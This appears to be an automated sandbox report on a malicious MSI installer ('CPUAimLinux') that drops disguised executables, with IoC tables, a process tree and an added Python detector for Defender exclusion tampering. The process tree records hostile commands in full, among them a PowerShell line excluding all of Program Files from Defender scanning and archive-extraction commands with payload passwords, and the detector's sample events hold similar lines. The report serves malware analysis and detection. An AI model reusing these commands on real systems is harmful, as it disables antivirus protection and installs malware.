Analysis

max time kernel: 141s
max time network: 125s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 19-11-2024 08:51

Static task: static1
Behavioral task: behavioral1
  Sample: 4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
  Resource: win10v2004-20241007-en

General

Target: 4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
Size: 27.1MB
MD5: 756b1b81669fb5b5d745c83ced428cb1
SHA1: c573e1f1d32780c808db53e5fd5e571d617816e6
SHA256: 4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d
SHA512: d9fd646383ff4fa82a920068b2141a94bd10424c5465040066d28be78be83ad730915b50bf1dfea9c2ed03b4a6b2287a19078a235a78aa835148a0381f5b00da
SSDEEP: 786432:G3OL1MXJ/fZz/yft39ldEQk9EzbR8VP0wiVD8Kyt:iOL1MXJ3Zz/etDdEQfHm10LU
Malware Config

Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  2608 | powershell.exe
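The command line the process tree records for PID 2608 excludes not only the drop directory C:\Program Files\CPUAimLinux but the entire C:\Program Files tree (listed twice). The following is an added example, not code from the report or from the sandbox vendor: a detector that scans process-creation command lines for Add-MpPreference / Set-MpPreference calls that register exclusions, de-duplicates the values and rates how much of the system each exclusion removes from scanning. The event field names pid and cmdline, the BROAD_ROOTS list and the severity labels are this example's own assumptions; the sample events other than the report's command line are constructed.

```python
"""Detect Defender exclusion tampering in process-creation command lines.

Added example, not code from the sandbox report or its vendor. Events are
dicts with the assumed fields "pid" and "cmdline".
"""
import re

EXCLUSION_PARAMS = ("ExclusionPath", "ExclusionExtension", "ExclusionProcess")

# Excluding any of these roots takes most of the file system out of real-time
# scanning; the list is this example's threshold, not a Defender setting.
BROAD_ROOTS = {
    "c:", "c:\\program files", "c:\\program files (x86)",
    "c:\\windows", "c:\\users", "c:\\programdata",
}
# Extensions whose exclusion lets arbitrary executables past scanning.
EXECUTABLE_EXTS = {"exe", "dll", "msi", "ps1", "bat", "cmd", "vbs", "js", "scr"}

# One PowerShell argument value: single-quoted, double-quoted, or a bare token.
_VALUE = r"(?:'[^']*'|\"[^\"]*\"|[^\s,;|\"']+)"
_PARAM_RE = re.compile(
    r"-(ExclusionPath|ExclusionExtension|ExclusionProcess)\s+"
    r"(" + _VALUE + r"(?:\s*,\s*" + _VALUE + r")*)",
    re.IGNORECASE,
)
_CMDLET_RE = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)

# Constructed sample events. The first command line is the one the report
# shows for PID 2608; the other two are made up for this example.
EVENTS = [
    {"pid": 2608, "cmdline":
        '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -Command '
        "Add-MpPreference -ExclusionPath 'C:\\Program Files\\CPUAimLinux',"
        "'C:\\Program Files','C:\\Program Files'"},
    {"pid": 4100, "cmdline":
        "powershell.exe -NoProfile -Command Get-MpPreference | Select-Object ExclusionPath"},
    {"pid": 4212, "cmdline":
        'powershell.exe -ep bypass -c "Set-MpPreference -ExclusionExtension exe,dll; '
        "Add-MpPreference -ExclusionProcess 'C:\\Users\\Admin\\AppData\\Local\\Temp\\update.exe'\""},
]


def _split_values(raw):
    """Split a comma-separated PowerShell value list, dropping the quotes."""
    return [v.strip("'\"") for v in re.findall(_VALUE, raw)]


def rate(param, value):
    """'high' for exclusions broad enough to neuter Defender, else 'medium'."""
    if param == "ExclusionPath" and value.rstrip("\\").lower() in BROAD_ROOTS:
        return "high"
    if param == "ExclusionExtension" and value.lstrip(".").lower() in EXECUTABLE_EXTS:
        return "high"
    return "medium"


def scan_cmdline(pid, cmdline):
    """Return one finding per distinct exclusion the command line registers."""
    if not _CMDLET_RE.search(cmdline):
        return []
    findings, seen = [], set()
    for m in _PARAM_RE.finditer(cmdline):
        param = next(p for p in EXCLUSION_PARAMS if p.lower() == m.group(1).lower())
        for value in _split_values(m.group(2)):
            key = (param, value.lower())
            if key in seen:  # the report's command lists 'C:\Program Files' twice
                continue
            seen.add(key)
            findings.append({"pid": pid, "param": param, "value": value,
                             "severity": rate(param, value)})
    return findings


def scan(events):
    """Run scan_cmdline over every event and flatten the findings."""
    return [f for ev in events for f in scan_cmdline(ev["pid"], ev["cmdline"])]


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"pid {f['pid']}: {f['severity']:6} {f['param']} = {f['value']}")
```

Only plain command lines are covered: a script passed through -EncodedCommand or run from a .ps1 file needs decoding or script-block logging first. On the endpoint the same change is also recorded by Defender itself in the Microsoft-Windows-Windows Defender/Operational log (event 5007, configuration changed), which survives even when process auditing is off.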
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\A:, \??\B:, \??\E: and \??\G: through \??\Z:, each opened twice (46 events; C:, D: and F: are not probed) | msiexec.exe
Drops file in System32 directory (1 IoC)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Drops file in Program Files directory (17 IoCs)
  description | ioc | Process
  File created | C:\Program Files\CPUAimLinux\WhatsApp1.exe | msiexec.exe
  File created | C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.exe | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File created | C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe | MsiExec.exe
  File created | C:\Program Files\CPUAimLinux\hHILqDIvDmMm.vbs | hHILqDIvDmMm.exe
  File created | C:\Program Files\CPUAimLinux\VC_redist.x64.exe | msiexec.exe
  File created | C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File opened for modification | C:\Program Files\CPUAimLinux\2_hHILqDIvDmMm.exe | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File opened for modification | C:\Program Files\CPUAimLinux\hHILqDIvDmMm | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File opened for modification | C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe | MsiExec.exe
  File created | C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe | msiexec.exe
  File created | C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL | msiexec.exe
  File opened for modification | C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File created | C:\Program Files\CPUAimLinux\2_hHILqDIvDmMm.exe | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File opened for modification | C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.exe | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File created | C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.xml | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File opened for modification | C:\Program Files\CPUAimLinux\DRrFaPIBzOdg.xml | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  File created | C:\Program Files\CPUAimLinux\hHILqDIvDmMm | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
Drops file in Windows directory (10 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\INF\setupapi.ev1 | DrvInst.exe
  File created | C:\Windows\Installer\f770b47.msi | msiexec.exe
  File created | C:\Windows\Installer\f770b48.ipi | msiexec.exe
  File opened for modification | C:\Windows\INF\setupapi.ev3 | DrvInst.exe
  File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
  File opened for modification | C:\Windows\Installer\f770b47.msi | msiexec.exe
  File opened for modification | C:\Windows\Installer\ | msiexec.exe
  File opened for modification | C:\Windows\Installer\MSICAE.tmp | msiexec.exe
  File created | C:\Windows\Installer\f770b4a.msi | msiexec.exe
  File opened for modification | C:\Windows\Installer\f770b48.ipi | msiexec.exe
Executes dropped EXE (4 IoCs)
  pid | Process
  1552 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  304 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  848 | hHILqDIvDmMm.exe
  1020 | WhatsApp1.exe
Event Triggered Execution: Installer Packages (2 TTPs, 1 IoC)
  pid | Process
  1236 | msiexec.exe
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | hHILqDIvDmMm.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  1612 | cmd.exe
  1516 | PING.EXE
Kills process with taskkill (1 IoC)
  pid | Process
  3024 | taskkill.exe
Modifies data under HKEY_USERS (48 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3069283f603adb01 | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | msiexec.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | msiexec.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | msiexec.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | DrvInst.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | DrvInst.exe
Modifies registry class (22 IoCs)
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Media\1 = ";" | msiexec.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Clients = 3a0000000000 | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4 | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\ProductName = "CPUAimLinux" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Language = "1033" | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\AdvertiseFlags = "388" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\DeploymentFlags = "3" | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DB99463B25670384096A57D9C0EE62BE | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\81E1A12860514854ABF64A65117DF8A4 | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\81E1A12860514854ABF64A65117DF8A4\ProductFeature | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\PackageCode = "C9E0E5BB8EB593F42ABE1AE58FB7B24A" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Version = "84344839" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\Assignment = "1" | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\PackageName = "4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi" | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Net | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList\Media | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\InstanceType = "0" | msiexec.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\AuthorizedLUAApp = "0" | msiexec.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DB99463B25670384096A57D9C0EE62BE\81E1A12860514854ABF64A65117DF8A4 | msiexec.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\81E1A12860514854ABF64A65117DF8A4\SourceList | msiexec.exe
Runs ping.exe (1 TTP, 1 IoC)
  pid | Process
  1516 | PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
  pid | Process
  1552 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  304 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
Suspicious behavior: EnumeratesProcesses (53 IoCs)
  pid | Process
  332 | msiexec.exe (2 events)
  2608 | powershell.exe (1 event)
  848 | hHILqDIvDmMm.exe (50 events)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token | pid | Process
  SeShutdownPrivilege | 1236 | msiexec.exe
  SeIncreaseQuotaPrivilege | 1236 | msiexec.exe
  SeRestorePrivilege | 332 | msiexec.exe
  SeTakeOwnershipPrivilege | 332 | msiexec.exe
  SeSecurityPrivilege | 332 | msiexec.exe
  SeCreateTokenPrivilege | 1236 | msiexec.exe
  SeAssignPrimaryTokenPrivilege | 1236 | msiexec.exe
  SeLockMemoryPrivilege | 1236 | msiexec.exe
  SeIncreaseQuotaPrivilege | 1236 | msiexec.exe
  SeMachineAccountPrivilege | 1236 | msiexec.exe
  SeTcbPrivilege | 1236 | msiexec.exe
  SeSecurityPrivilege | 1236 | msiexec.exe
  SeTakeOwnershipPrivilege | 1236 | msiexec.exe
  SeLoadDriverPrivilege | 1236 | msiexec.exe
  SeSystemProfilePrivilege | 1236 | msiexec.exe
  SeSystemtimePrivilege | 1236 | msiexec.exe
  SeProfSingleProcessPrivilege | 1236 | msiexec.exe
  SeIncBasePriorityPrivilege | 1236 | msiexec.exe
  SeCreatePagefilePrivilege | 1236 | msiexec.exe
  SeCreatePermanentPrivilege | 1236 | msiexec.exe
  SeBackupPrivilege | 1236 | msiexec.exe
  SeRestorePrivilege | 1236 | msiexec.exe
  SeShutdownPrivilege | 1236 | msiexec.exe
  SeDebugPrivilege | 1236 | msiexec.exe
  SeAuditPrivilege | 1236 | msiexec.exe
  SeSystemEnvironmentPrivilege | 1236 | msiexec.exe
  SeChangeNotifyPrivilege | 1236 | msiexec.exe
  SeRemoteShutdownPrivilege | 1236 | msiexec.exe
  SeUndockPrivilege | 1236 | msiexec.exe
  SeSyncAgentPrivilege | 1236 | msiexec.exe
  SeEnableDelegationPrivilege | 1236 | msiexec.exe
  SeManageVolumePrivilege | 1236 | msiexec.exe
  SeImpersonatePrivilege | 1236 | msiexec.exe
  SeCreateGlobalPrivilege | 1236 | msiexec.exe
  SeBackupPrivilege | 2336 | vssvc.exe
  SeRestorePrivilege | 2336 | vssvc.exe
  SeAuditPrivilege | 2336 | vssvc.exe
  SeBackupPrivilege | 332 | msiexec.exe
  SeRestorePrivilege | 332 | msiexec.exe
  SeRestorePrivilege (7 events) | 2712 | DrvInst.exe
  SeLoadDriverPrivilege (3 events) | 2712 | DrvInst.exe
  SeRestorePrivilege | 332 | msiexec.exe
  SeTakeOwnershipPrivilege | 332 | msiexec.exe
  SeRestorePrivilege | 332 | msiexec.exe
  SeTakeOwnershipPrivilege | 332 | msiexec.exe
  SeRestorePrivilege | 332 | msiexec.exe
  SeTakeOwnershipPrivilege | 332 | msiexec.exe
  SeDebugPrivilege | 2608 | powershell.exe
  SeRestorePrivilege | 1552 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  35 | 1552 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  SeSecurityPrivilege (2 events) | 1552 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  SeRestorePrivilege | 304 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  35 | 304 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
  SeSecurityPrivilege (2 events) | 304 | fXlHSNCgjpwhjcbESorcUuElETFupI.exe
Suspicious use of FindShellTrayWindow (1 IoC)
  pid | Process
  1236 | msiexec.exe
Suspicious use of WriteProcessMemory (35 IoCs)
  description | pid | Process | procid_target
  PID 332 wrote to memory of 1520 (5 events) | 332 | msiexec.exe | 35
  PID 1520 wrote to memory of 2608 (3 events) | 1520 | MsiExec.exe | 37
  PID 1520 wrote to memory of 1612 (3 events) | 1520 | MsiExec.exe | 39
  PID 1612 wrote to memory of 1552 (4 events) | 1612 | cmd.exe | 41
  PID 1612 wrote to memory of 1516 (3 events) | 1612 | cmd.exe | 42
  PID 1612 wrote to memory of 304 (4 events) | 1612 | cmd.exe | 44
  PID 1520 wrote to memory of 848 (4 events) | 1520 | MsiExec.exe | 46
  PID 1520 wrote to memory of 1020 (3 events) | 1520 | MsiExec.exe | 47
  PID 1520 wrote to memory of 3024 (3 events) | 1520 | MsiExec.exe | 48
  PID 1020 wrote to memory of 3000 (3 events) | 1020 | WhatsApp1.exe | 51
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Windows\system32\msiexec.exe  (PID 1236)
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4037df6c0b60bb7d411ba6f760843830bcb80483713e6eb91db5b9c8b9f0711d.msi
    - Enumerates connected drives
    - Event Triggered Execution: Installer Packages
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow

C:\Windows\system32\msiexec.exe  (PID 332)
    C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\MsiExec.exe  (PID 1520)
        C:\Windows\system32\MsiExec.exe -Embedding 7DC72E46DDD054285256FC31F8F424C0 M Global\MSI0000
        - Drops file in Program Files directory
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2608)
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\CPUAimLinux','C:\Program Files','C:\Program Files'
            - Command and Scripting Interpreter: PowerShell
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

        C:\Windows\System32\cmd.exe  (PID 1612)
            "C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y
            - System Network Configuration Discovery: Internet Connection Discovery
            - Suspicious use of WriteProcessMemory

            C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe  (PID 1552)
                "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" -o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y
                - Drops file in Program Files directory
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: CmdExeWriteProcessMemorySpam
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\PING.EXE  (PID 1516)
                ping 127.0.0.1 -n 2
                - System Network Configuration Discovery: Internet Connection Discovery
                - Runs ping.exe

            C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe  (PID 304)
                "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" -x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" -x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" -p"86225)AYVohjF3DD0{k[" -y
                - Drops file in Program Files directory
                - Executes dropped EXE
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: CmdExeWriteProcessMemorySpam
                - Suspicious use of AdjustPrivilegeToken

        C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe  (PID 848)
            "C:\Program Files\CPUAimLinux\hHILqDIvDmMm.exe" -number 169 -file file3 -mode mode3
            - Drops file in Program Files directory
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses

        C:\Program Files\CPUAimLinux\WhatsApp1.exe  (PID 1020)
            "C:\Program Files\CPUAimLinux\WhatsApp1.exe"
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

            C:\Windows\system32\WerFault.exe  (PID 3000)
                C:\Windows\system32\WerFault.exe -u -p 1020 -s 632

        C:\Windows\System32\taskkill.exe  (PID 3024)
            "C:\Windows\System32\taskkill.exe" /F /IM msiexec.exe
            - Kills process with taskkill

C:\Windows\system32\vssvc.exe  (PID 2336)
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\DrvInst.exe  (PID 2712)
    DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000060" "00000000000005A8"
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe  (PID 652)
    C:\Windows\system32\msiexec.exe /V
